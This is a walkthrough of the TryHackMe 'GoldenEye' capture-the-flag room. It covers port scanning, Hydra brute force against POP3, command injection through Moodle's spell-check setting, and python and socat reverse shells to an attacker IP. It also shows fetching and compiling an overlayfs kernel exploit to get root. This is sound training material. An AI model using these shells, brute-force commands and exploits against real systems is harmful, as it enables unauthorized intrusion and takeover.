Today we will be doing a James Bond style room on TryHackMe called GoldenEye. Let’s start off by enumerating the box, our first question wants to know how many ports are open.
For this we will use the -p- option to scan all the ports.
We use the -T4 option to scan at the second fastest rate.
Finally the –reason flag to know why Nmap thinks a port is open or closed.
nmap -p- -T4 –reason <Target>
We have 4 open ports and 3 filtered ports, so the answer to question 1 is 4.
Now let’s identify the services running on the ports, by specifying the ports we want to scan.
nmap -p25,80,3010,37414,41690,55006,55007 -T4 -sV –reason <IP>
-sV – is for service version
Looks like port 80 is open, let’s look at the website to see if there’s anything interesting.
The page tells us to login we need to visit /sev-home. After visiting the page it pops up a dialog box and doesn’t let us through, we need to find the password.
We can right click on the web page and then select inspect element. Going through the source code doesn’t provide anything exciting, I wonder if there’s something hidden in the javascript files. Click on Debugger and then under the drop down for the IP address, click on terminal.js.
Great we have an encoded password hidden in the comments of the java script code. A great online tool for decoding passwords, and other strings, is CyberChef. You can give it what is called a recipe and it will decode the password. There’s a recipe called Magic that will attempt different ways to decode the password and tell you what the output is.
https://gchq.github.io/CyberChef/
Put in the encoded password under Input and then drag Magic into the Recipe column. Under Output we can see they used From_HTML_Entity() to decode the password, which is InvincibleHack3r
Now let’s try to login to the page located at http://<IP>/sev-home
Remember that the password we decoded was for Boris, so let’s try that username. At first it didn’t work, but that’s because the name is case sensitive, so after using boris with a password of InvincbleHack3r we get logged in!
Now we should go try to use our credentials for other services. POP3 is a mail protocol, so maybe we can check Boris’s mail. Earlier we discovered port 55007 was open and it’s version is Dovecot pop3d. Dovecot is an open source application that allows you to receive emails on a Linux server. Let’s try to establish a connection!
We can use telnet to connect to the port, then we are greeted with GoldenEye POP3 Electronic-Mail System. Now we need to authenticate type the following
user boris
pass InvincibleHack3r
Sadly it looks like Boris is smart and doesn’t re-use his password for the website that we discovered. Maybe we can brute force his password. This means we will just continually try passwords from a wordlist to see if any allow us to login. Looking at a Hydra cheat sheet, it looks like we can brute force pop3 using the tool. (https://github.com/frizb/Hydra-Cheatsheet)
hydra -l boris -P /usr/share/wordlists/fasttrack.txt -f -V -s 55007 10.10.76.154 pop3
-l – This is for the username we want to brute force.
-P – This is for a password list we want to use.
-s – This allows us to specify a port since the pop3 service is running on a non-standard port.
-f – This will exit the command once a valid username and password combination are found. This is good, because since we are only attacking one user we don’t need to keep trying bad passwords once we find the correct one.
Finally we add in the IP and the protocol we want to brute force, using -v for verbose.
I like to start with the fasttrack wordlist, because it’s much shorter and if it doesn’t work you could move onto something like rockyou. Luckily for this machine we found our credentials!
NOTE: On kali you can find some wordlists under /usr/share/wordlists/
So let’s login using telnet, which is the service configured for the port and the answer to our question.
telnet <IP> 55007
user boris
pass secret1!
We can use the LIST command to view a summary of email messages. If we want to read the emails you use the retr command along with the number displayed on the left.
We see an email from natalya@ubuntu so this maybe another account on the machine! We can try to brute force natalya’s password just like we did Boris’s password.
Looking at the email from alec@janus.boss there is an email that discusses codes and that they should be placed in the root directory. We will want to download this email and get the attachment with the codes.
I had some issues downloading attachments, but I can probably brute force alec’s password.
echo “natalya\nalec” > users.txt
Here I wanted a one liner to add in our users to brute force (natalya and alec) in a single command. Cat out the file to ensure the 2 names are in the users.txt file. We use a \n between the names for a new line.
hydra -L users.txt -P /usr/share/wordlists/fasttrack.txt -f -V -s 55007 10.10.76.154 pop3
The only change from the previous command in the -L which will user a user list instead of a single username. Additionally I added the -T flag to define the max amount of threads to be used during the attack.
We were able to brute force natalya’s password and it’s bird.
Let’s read through natalya’s emails.
telnet <target IP> 55007
user natalya
pass bird
list
retr 1
retr 2
The retr command allows us to retrieve the email, we find an email with credentials for xenia and information about the internal Domain: severnaya-station.com/gnocertdir
Now we need to edit the /etc/host file to access http://servernaya-station.com. The /etc/host file allows us to specify domain name to their corresponding IP address. This is used a lot in these kinds challenges like TryHackMe and HackTheBox.
nano /etc/hosts
<target IP> servernaya-station.com
Now visit http://servernaya-station.com/gnocertdir in your browser.
On the right side we see that the user to this moodle platform should be admin.
Turns out the admin is just to distract you, actually use the credentials for xenia given in the email.
At the bottom of the page we have a message from Dr Doak, who is another user.
Maybe we can use doak as a username to the pop3 service.
I added doak to users.txt and then started hydra again.
hydra -T 64 -L users.txt -P /usr/share/wordlists/fasttrack.txt -f -V -s 55007 10.10.219.77 pop3 -I
Finally we crack doak’s password!
Now let’s check Dr. Doak’s email.
telnet <target IP> 55007
user doak
pass goat
list
We see there’s one message so let’s read it.
retr 1
Now we have another user’s password for the website so let’s login there. We have also answered what is the next user you can find from doak? It’s dr_doak
When you login, click on the top right where it says Dr Doak, then click on My private files.
Looks like we have a file for james called s3cret.txt
It looks like someone left us admin credentials located at http://severnaya-station.com/dir007key/for-007.jpg
The page looks uninteresting maybe there’s something hidden in the file? Let’s download it
wget http://servernaya-station.com/dir007key/for-007.jpg
We can run the strings command to see if anything sticks out, sometimes people can hide information in the exif data of photos. Exif data is the exchangeable image file format that defines specific information about an image. It is possible to embed information within pictures. You can even embed code within exif data, which could allow code execution on a target server where you can upload picture files. We can run the strings command to try and pick something out of it.
strings for-007.jpg
It looks like there is some base64 encoded text, given away by the = sign at the end. Let’s try to decode it.
echo eFdpbnRlcjE5OTV4IQ== | base64 -d
We can now log into the site as Admin with the password xWinter1995x!
With the Admin user we can modify the site. At the bottom we can search and our hint says to use aspell, so search for that.
Let’s see what happens if we pass it a command. I didn’t get anything in the output. Let’s just try a reverse shell, maybe netcat is on the box.
Run this on your attacker machine. This is to set up a listener where your attacker machine will look for incoming connections.
nc -nlvp 1337
Now make this the command for aspell.
nc <Your IP> 1337
I didn’t get a shell, so let’s look for the spell engine settings.
In the bottom search for spell engine. Then change the settings to be PSpellShell. This should allow us to the use the shell instead of the default of Google Spell.
Now let’s create a blog post and use the spell checker to see if we can get a shell!
Click on My Profile > Blogs > Add a new entry.
Sadly I didn’t get the shell. After trying a few different shells, it turns out python3 is on the machine, so I can use a python3 reverse shell.
The one I used came from https://github.com/infosec-au/fuzzdb/blob/master/attack-payloads/os-cmd-execution/reverse-shell-one-liners.doc.txt
Be sure to put in your attacker machine IP address.
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“ATTACKERIP“,1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/bash”,”-i”]);’
We finally have a shell! I ran whoami and we are www-data, which means we will need to do some privilege escalation. This is because the account running the web server is www-data, which is good security practice. If this web server were run by root, we would automatically have full control of the machine.
I tried to see if this user had any sudo privileges (highly unlikely) by running sudo -l, and it says I don’t have a tty. We can upgrade to a full tty using socat. We could also use python here, but I want to use a different method.
First you need to download the stand-alone socat binaries onto your attacker machine located at https://github.com/andrew-d/static-binaries
If you just want to download the socat binary you can run
wget https://github.com/andrew-d/static-binaries/raw/master/binaries/darwin/socat
Now we need to spin up a python web server so we can download it from our target machine.
Attacker machine
python3 -m http.server 7777
Target machine
wget http://<AttackerIP>:7777/socat; chmod +x socat
I used the semi-colon to run multiple commands, chmod +x makes the binary executable so we can run it.
Now on the Attacker machine you start a socat listener by running
socat file:`tty`,raw,echo=0 tcp-listen:4444
NOTE: the character before and after tty is using the key above the tab key.
Now on your target run this command, replacing with your Attacker IP. This will give us a full tty reverse shell.
socat exec:’bash -li’,pty,stderr,setsid,sigint,sane tcp:<ATTACKERIP>:4444
I ran into a program, I downloaded the wrong socat binary, which caused me to get the error bash: ./socat: cannot execute binary file: Exec format error. So we need to check the architecture of the machine.
uname -m
It’s x86_64 so the file we actually need is https://github.com/andrew-d/static-binaries/raw/master/binaries/linux/x86_64/socat
Now when we run it the target machine just idles, which means we should have a new reverse shell!
Now we can run sudo -l which we need the password for, so this isn’t the right way. This would list out any privileges you have as sudo, which can usually lead to privilege escalation.
We can use uname -a to get some information about the system and we can cat out the os-release file for more information.
uname -a
cat /etc/os-release
Looks like the kernel is from 2014, so we may have a kernel level vulnerability. If we Google “Ubuntu 14.04.1 LTS privilege escalation” the first result is about overlayfs from Exploit Database. The information says it works on kernels before 2015-12-26 so it looks like we may have a good exploit! https://www.exploit-db.com/exploits/39166
When we click download we see that this is a see file, so we can download it to our Attacker box, transfer to the target, and compile the code on there. You want to compile on the target in case libraries are different between the attacker box and the target box. At first I tried to compile it on my attacker machine, because I couldn’t find a compiler to use on the target machine.
Attacker box
wget https://www.exploit-db.com/download/39166
gcc -Wall -save-temps 39166 -o hack
python3 -m http.server 7777
Target
cd /tmp
wget http://<AttackerIP>:7777/hack
chmod +x hack
./hack
Since we don’t have gcc on the target, we need to compile exploits on our local machine and hope that they work.
I went searching some more and found a blog showing 3 different ways for privilege escalation
https://www.programmersought.com/article/23994556760/
It turns out you do need to compile the exploit on the target machine. So what development tools are on this machine. I wonder if they just renamed gcc to something similar.
find / -name “*cc” 2>/dev/null
We find /usr/bin/cc I wonder what that is?
/usr/bin/cc -v
Looks like maybe it’s actually gcc, but hidden from us. Since now we are using cc, we need to replace that in the system call in our exploit. Modify this on your attacker machine.
Now we can transfer the exploit over to our target, compile it, and finally get a root shell!
Attacker machine
python3 -m http.server 7777
Target
wget http://10.6.43.108:7777/exploit.c
/usr/bin/cc -Wall -save-temps exploit.c -o win
chmod +x win
./win
Finally we have a root shell! Go and grab the root flag!
Well wait the flag isn’t just /root.txt. Let’s go look at the root directory
cd /
ls -lah
Looks like we need to go visit the website again.
Maybe the flag is hidden in the exif data again.
wget http://servernaya-station.com/006-final-xvf7-flag
But this is just an HTML page, the flag is actually the codes above!
I hope you learned a lot from this post, this was a fun box, but it seems highly unstable at times. Good luck and see you in the next post!